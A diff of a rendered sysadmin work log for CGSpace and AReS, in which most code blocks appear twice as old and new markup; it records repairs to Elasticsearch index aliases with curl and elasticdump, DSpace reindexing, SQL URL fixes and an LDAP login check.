&#34;openrxv-items-temp&#34;: {
&#34;aliases&#34;: {}
},
&#34;openrxv-items-final&#34;: {
&#34;aliases&#34;: {
&#34;openrxv-items&#34;: {}
}
},
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
</span></span><span style="display:flex;"><span>yellow open openrxv-items-temp H-CGsyyLTaqAj6-nKXZ-7w 1 1 0 0 283b 283b
</span></span><span style="display:flex;"><span>yellow open openrxv-items-final ul3SKsa7Q9Cd_K7qokBY_w 1 1 103951 0 254mb 254mb
</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span> &#34;openrxv-items-temp&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {}
</span></span><span style="display:flex;"><span> },
</span></span><span style="display:flex;"><span> &#34;openrxv-items-final&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {
</span></span><span style="display:flex;"><span> &#34;openrxv-items&#34;: {}
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span> },
</span></span></code></pre></div><ul>
<li>I think they look OK (<code>openrxv-items</code> is an alias of <code>openrxv-items-final</code>), but I took a backup just in case:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --type<span style="color:#f92672">=</span>mapping
$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --type<span style="color:#f92672">=</span>data --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --type<span style="color:#f92672">=</span>mapping
</span></span><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --type<span style="color:#f92672">=</span>data --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span>
</span></span></code></pre></div><ul>
<li>Then I started an indexing in the AReS Explorer admin dashboard</li>
<li>The indexing finished, but it looks like the aliases are messed up again:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
yellow open openrxv-items-temp H-CGsyyLTaqAj6-nKXZ-7w 1 1 104165 105024 487.7mb 487.7mb
yellow open openrxv-items-final d0tbMM_SRWimirxr_gm9YA 1 1 937 0 2.2mb 2.2mb
</code></pre></div><h2 id="2021-05-05">2021-05-05</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
</span></span><span style="display:flex;"><span>yellow open openrxv-items-temp H-CGsyyLTaqAj6-nKXZ-7w 1 1 104165 105024 487.7mb 487.7mb
</span></span><span style="display:flex;"><span>yellow open openrxv-items-final d0tbMM_SRWimirxr_gm9YA 1 1 937 0 2.2mb 2.2mb
</span></span></code></pre></div><h2 id="2021-05-05">2021-05-05</h2>
<ul>
<li>Peter noticed that we no longer display <code>cg.link.reference</code> on the item view
<ul>
@ -229,9 +229,9 @@ yellow open openrxv-items-final d0tbMM_SRWimirxr_gm9YA 1 1 937 0
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ time ~/dspace64/bin/dspace index-discovery -b
~/dspace64/bin/dspace index-discovery -b 4053.24s user 53.17s system 38% cpu 2:58:53.83 total
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time ~/dspace64/bin/dspace index-discovery -b
</span></span><span style="display:flex;"><span>~/dspace64/bin/dspace index-discovery -b 4053.24s user 53.17s system 38% cpu 2:58:53.83 total
</span></span></code></pre></div><ul>
<li>Nope! Still slow, and still no mapped item&hellip;
<ul>
<li>I even tried unmapping it from all collections, and adding it to a single new owning collection&hellip;</li>
@ -244,53 +244,53 @@ yellow open openrxv-items-final d0tbMM_SRWimirxr_gm9YA 1 1 937 0
</li>
<li>The indexes on AReS Explorer are messed up after last week&rsquo;s harvesting:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
yellow open openrxv-items-temp H-CGsyyLTaqAj6-nKXZ-7w 1 1 104165 105024 487.7mb 487.7mb
yellow open openrxv-items-final d0tbMM_SRWimirxr_gm9YA 1 1 937 0 2.2mb 2.2mb
<span style="color:#960050;background-color:#1e0010">
</span><span style="color:#960050;background-color:#1e0010"></span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool
...
&#34;openrxv-items-final&#34;: {
&#34;aliases&#34;: {}
},
&#34;openrxv-items-temp&#34;: {
&#34;aliases&#34;: {
&#34;openrxv-items&#34;: {}
}
}
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
</span></span><span style="display:flex;"><span>yellow open openrxv-items-temp H-CGsyyLTaqAj6-nKXZ-7w 1 1 104165 105024 487.7mb 487.7mb
</span></span><span style="display:flex;"><span>yellow open openrxv-items-final d0tbMM_SRWimirxr_gm9YA 1 1 937 0 2.2mb 2.2mb
</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool
</span></span><span style="display:flex;"><span>...
</span></span><span style="display:flex;"><span> &#34;openrxv-items-final&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {}
</span></span><span style="display:flex;"><span> },
</span></span><span style="display:flex;"><span> &#34;openrxv-items-temp&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {
</span></span><span style="display:flex;"><span> &#34;openrxv-items&#34;: {}
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span> }
</span></span></code></pre></div><ul>
<li><code>openrxv-items</code> should be an alias of <code>openrxv-items-final</code>&hellip;</li>
<li>I made a backup of the temp index and then started indexing on the AReS Explorer admin dashboard:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-temp-backup
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</code></pre></div><h2 id="2021-05-10">2021-05-10</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items-temp-backup
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: false}}&#39;</span>
</span></span></code></pre></div><h2 id="2021-05-10">2021-05-10</h2>
<ul>
<li>Amazing, the harvesting on AReS finished but it messed up all the indexes and now there are no items in any index!</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
yellow open openrxv-items-temp 8thRX0WVRUeAzmd2hkG6TA 1 1 0 0 283b 283b
yellow open openrxv-items-temp-backup _0tyvctBTg2pjOlcoVP1LA 1 1 104165 20134 305.5mb 305.5mb
yellow open openrxv-items-final BtvV9kwVQ3yBYCZvJS1QyQ 1 1 0 0 283b 283b
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
</span></span><span style="display:flex;"><span>yellow open openrxv-items-temp 8thRX0WVRUeAzmd2hkG6TA 1 1 0 0 283b 283b
</span></span><span style="display:flex;"><span>yellow open openrxv-items-temp-backup _0tyvctBTg2pjOlcoVP1LA 1 1 104165 20134 305.5mb 305.5mb
</span></span><span style="display:flex;"><span>yellow open openrxv-items-final BtvV9kwVQ3yBYCZvJS1QyQ 1 1 0 0 283b 283b
</span></span></code></pre></div><ul>
<li>I fixed the indexes manually by re-creating them and cloning from the backup:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final&#39;</span>
$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp-backup/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
$ curl -s -X POST http://localhost:9200/openrxv-items-temp-backup/_clone/openrxv-items-final
$ curl -s -X POST <span style="color:#e6db74">&#39;http://localhost:9200/_aliases&#39;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;</span>
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp-backup&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp-backup/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp-backup/_clone/openrxv-items-final
</span></span><span style="display:flex;"><span>$ curl -s -X POST <span style="color:#e6db74">&#39;http://localhost:9200/_aliases&#39;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp-backup&#39;</span>
</span></span></code></pre></div><ul>
<li>Also I ran all updated on the server and updated all Docker images, then rebooted the server (linode20):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ docker images | grep -v ^REPO | sed <span style="color:#e6db74">&#39;s/ \+/:/g&#39;</span> | cut -d: -f1,2 | xargs -L1 docker pull
</span></span></code></pre></div><ul>
<li>I backed up the AReS Elasticsearch data using elasticdump, then started a new harvest:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --type<span style="color:#f92672">=</span>mapping
$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --type<span style="color:#f92672">=</span>data --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --type<span style="color:#f92672">=</span>mapping
</span></span><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --type<span style="color:#f92672">=</span>data --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span>
</span></span></code></pre></div><ul>
<li>Discuss CGSpace statistics with the CIP team
<ul>
<li>They were wondering why their numbers for 2020 were so low</li>
@ -329,10 +329,10 @@ $ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/o
</li>
<li>I checked the CLARISA list against ROR&rsquo;s April, 2020 release (&ldquo;Version 9&rdquo;, on figshare, though it is version 8 in the dump):</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ./ilri/ror-lookup.py -i /tmp/clarisa-institutions.txt -r ror-data-2021-04-06.json -o /tmp/clarisa-ror-matches.csv
$ csvgrep -c matched -m <span style="color:#e6db74">&#39;true&#39;</span> /tmp/clarisa-ror-matches.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> | wc -l
1770
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/ror-lookup.py -i /tmp/clarisa-institutions.txt -r ror-data-2021-04-06.json -o /tmp/clarisa-ror-matches.csv
</span></span><span style="display:flex;"><span>$ csvgrep -c matched -m <span style="color:#e6db74">&#39;true&#39;</span> /tmp/clarisa-ror-matches.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> | wc -l
</span></span><span style="display:flex;"><span>1770
</span></span></code></pre></div><ul>
<li>With 1770 out of 6230 matched, that&rsquo;s 28.5%&hellip;</li>
<li>I sent an email to Hector Tobon to point out the issues in CLARISA again and ask him to chat</li>
<li>Meeting with GARDIAN developers about CG Core and how GARDIAN works</li>
@ -341,11 +341,11 @@ $ csvgrep -c matched -m <span style="color:#e6db74">&#39;true&#39;</span> /tmp/c
<ul>
<li>Fix a few thousand IWMI URLs that are using HTTP instead of HTTPS on CGSpace:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">localhost/dspace63= &gt; UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;http://www.iwmi.cgiar.org&#39;,&#39;https://www.iwmi.cgiar.org&#39;, &#39;g&#39;) WHERE text_value LIKE &#39;http://www.iwmi.cgiar.org%&#39; AND metadata_field_id=219;
UPDATE 1132
localhost/dspace63= &gt; UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;http://publications.iwmi.org&#39;,&#39;https://publications.iwmi.org&#39;, &#39;g&#39;) WHERE text_value LIKE &#39;http://publications.iwmi.org%&#39; AND metadata_field_id=219;
UPDATE 1803
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;http://www.iwmi.cgiar.org&#39;,&#39;https://www.iwmi.cgiar.org&#39;, &#39;g&#39;) WHERE text_value LIKE &#39;http://www.iwmi.cgiar.org%&#39; AND metadata_field_id=219;
</span></span><span style="display:flex;"><span>UPDATE 1132
</span></span><span style="display:flex;"><span>localhost/dspace63= &gt; UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;http://publications.iwmi.org&#39;,&#39;https://publications.iwmi.org&#39;, &#39;g&#39;) WHERE text_value LIKE &#39;http://publications.iwmi.org%&#39; AND metadata_field_id=219;
</span></span><span style="display:flex;"><span>UPDATE 1803
</span></span></code></pre></div><ul>
<li>In the case of the latter, the HTTP links don&rsquo;t even work! The web server returns HTTP 404 unless the request is HTTPS</li>
<li>IWMI also says that their subjects are a subset of AGROVOC so they no longer want to use <code>cg.subject.iwmi</code> for their subjects
<ul>
@ -367,67 +367,67 @@ UPDATE 1803
<ul>
<li>I have to fix the Elasticsearch indexes on AReS after last week&rsquo;s harvesting because, as always, the <code>openrxv-items</code> index should be an alias of <code>openrxv-items-final</code> instead of <code>openrxv-items-temp</code>:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool
&#34;openrxv-items-final&#34;: {
&#34;aliases&#34;: {}
},
&#34;openrxv-items-temp&#34;: {
&#34;aliases&#34;: {
&#34;openrxv-items&#34;: {}
}
},
...
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool
</span></span><span style="display:flex;"><span> &#34;openrxv-items-final&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {}
</span></span><span style="display:flex;"><span> },
</span></span><span style="display:flex;"><span> &#34;openrxv-items-temp&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {
</span></span><span style="display:flex;"><span> &#34;openrxv-items&#34;: {}
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span> },
</span></span><span style="display:flex;"><span>...
</span></span></code></pre></div><ul>
<li>I took a backup of the <code>openrxv-items</code> index with elasticdump so I can re-create them manually before starting a new harvest tomorrow:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --type<span style="color:#f92672">=</span>mapping
$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --type<span style="color:#f92672">=</span>data --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span>
</code></pre></div><h2 id="2021-05-16">2021-05-16</h2>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --type<span style="color:#f92672">=</span>mapping
</span></span><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items --output<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --type<span style="color:#f92672">=</span>data --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span>
</span></span></code></pre></div><h2 id="2021-05-16">2021-05-16</h2>
<ul>
<li>I deleted and re-created the Elasticsearch indexes on AReS:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final&#39;</span>
$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
$ curl -XPUT <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final&#39;</span>
$ curl -XPUT <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
$ curl -s -X POST <span style="color:#e6db74">&#39;http://localhost:9200/_aliases&#39;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XPUT <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-final&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -XPUT <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
</span></span><span style="display:flex;"><span>$ curl -s -X POST <span style="color:#e6db74">&#39;http://localhost:9200/_aliases&#39;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;actions&#34; : [{&#34;add&#34; : { &#34;index&#34; : &#34;openrxv-items-final&#34;, &#34;alias&#34; : &#34;openrxv-items&#34;}}]}&#39;</span>
</span></span></code></pre></div><ul>
<li>Then I re-imported the backup that I created with elasticdump yesterday:</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ elasticdump --input<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --output<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items-final --type<span style="color:#f92672">=</span>mapping
$ elasticdump --input<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --output<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items-final --type<span style="color:#f92672">=</span>data --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span>
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>/home/aorth/openrxv-items_mapping.json --output<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items-final --type<span style="color:#f92672">=</span>mapping
</span></span><span style="display:flex;"><span>$ elasticdump --input<span style="color:#f92672">=</span>/home/aorth/openrxv-items_data.json --output<span style="color:#f92672">=</span>http://localhost:9200/openrxv-items-final --type<span style="color:#f92672">=</span>data --limit<span style="color:#f92672">=</span><span style="color:#ae81ff">1000</span>
</span></span></code></pre></div><ul>
<li>Then I started a new harvest on AReS</li>
</ul>
<h2 id="2021-05-17">2021-05-17</h2>
<ul>
<li>The AReS harvest finished and the Elasticsearch indexes seem OK so I shouldn&rsquo;t have to fix them next time&hellip;</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
yellow open openrxv-items-temp o3ijJLcyTtGMOPeWpAJiVA 1 1 0 0 283b 283b
yellow open openrxv-items-final TrJ1Ict3QZ-vFkj-4VcAzw 1 1 104317 0 259.4mb 259.4mb
$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool
&#34;openrxv-items-temp&#34;: {
&#34;aliases&#34;: {}
},
&#34;openrxv-items-final&#34;: {
&#34;aliases&#34;: {
&#34;openrxv-items&#34;: {}
}
},
...
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s http://localhost:9200/_cat/indices | grep openrxv-items
</span></span><span style="display:flex;"><span>yellow open openrxv-items-temp o3ijJLcyTtGMOPeWpAJiVA 1 1 0 0 283b 283b
</span></span><span style="display:flex;"><span>yellow open openrxv-items-final TrJ1Ict3QZ-vFkj-4VcAzw 1 1 104317 0 259.4mb 259.4mb
</span></span><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/_alias/&#39;</span> | python -m json.tool
</span></span><span style="display:flex;"><span> &#34;openrxv-items-temp&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {}
</span></span><span style="display:flex;"><span> },
</span></span><span style="display:flex;"><span> &#34;openrxv-items-final&#34;: {
</span></span><span style="display:flex;"><span> &#34;aliases&#34;: {
</span></span><span style="display:flex;"><span> &#34;openrxv-items&#34;: {}
</span></span><span style="display:flex;"><span> }
</span></span><span style="display:flex;"><span> },
</span></span><span style="display:flex;"><span>...
</span></span></code></pre></div><ul>
<li>Abenet said she and some others can&rsquo;t log into CGSpace
<ul>
<li>I tried to check the CGSpace LDAP account and it does seem to be not working:</li>
</ul>
</li>
</ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4"><code class="language-console" data-lang="console">$ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b <span style="color:#e6db74">&#34;dc=cgiarad,dc=org&#34;</span> -D <span style="color:#e6db74">&#34;cgspace-ldap@cgiarad.org&#34;</span> -W <span style="color:#e6db74">&#34;(sAMAccountName=aorth)&#34;</span>
Enter LDAP Password:
ldap_bind: Invalid credentials (49)
additional info: 80090308: LdapErr: DSID-0C090453, comment: AcceptSecurityContext error, data 532, v3839
</code></pre></div><ul>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ldapsearch -x -H ldaps://AZCGNEROOT2.CGIARAD.ORG:636/ -b <span style="color:#e6db74">&#34;dc=cgiarad,dc=org&#34;</span> -D <span style="color:#e6db74">&#34;cgspace-ldap@cgiarad.org&#34;</span> -W <span style="color:#e6db74">&#34;(sAMAccountName=aorth)&#34;</span>
